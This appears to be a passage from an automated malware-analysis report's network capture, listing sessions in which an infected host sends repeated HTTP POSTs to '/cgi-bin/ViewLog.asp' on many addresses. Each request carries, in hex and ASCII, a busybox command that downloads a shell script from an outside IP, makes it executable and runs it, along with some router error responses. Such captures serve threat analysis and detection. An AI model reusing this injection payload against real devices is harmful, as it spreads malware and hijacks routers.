                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:51.230608940 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:59.165685892 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.035343885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:47.542665005 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        294192.168.2.233747031.136.40.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.243432045 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:45.247394085 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:47.231064081 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:51.230593920 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:59.165623903 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.035381079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:47.542665958 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        295192.168.2.234553495.245.250.708080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.245312929 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:44.580658913 CEST226INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 13:51:48 GMT
                                                        Content-Type: text/html
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        296192.168.2.234886231.134.156.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.262833118 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        297192.168.2.234593231.223.63.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.273891926 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:44.631267071 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: ZTE web server 1.0 ZTE corp 2015.
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Security-Policy: frame-ancestors 'self' data:
                                                        Cache-Control: no-cache,no-store
                                                        Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61
                                                        Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own ca


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        298192.168.2.235832831.136.56.328080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.553975105 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:45.535384893 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:47.486999035 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:51.486469984 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:59.421468019 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.035343885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:47.542665958 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        299192.168.2.234319485.11.98.1478080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.581054926 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        300192.168.2.235662694.123.0.1138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.603828907 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        301192.168.2.234712694.120.46.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.603974104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        302192.168.2.235765494.120.39.878080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:44.606745958 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        303192.168.2.2356746112.167.224.17580
                                                        TimestampBytes transferredDirectionData
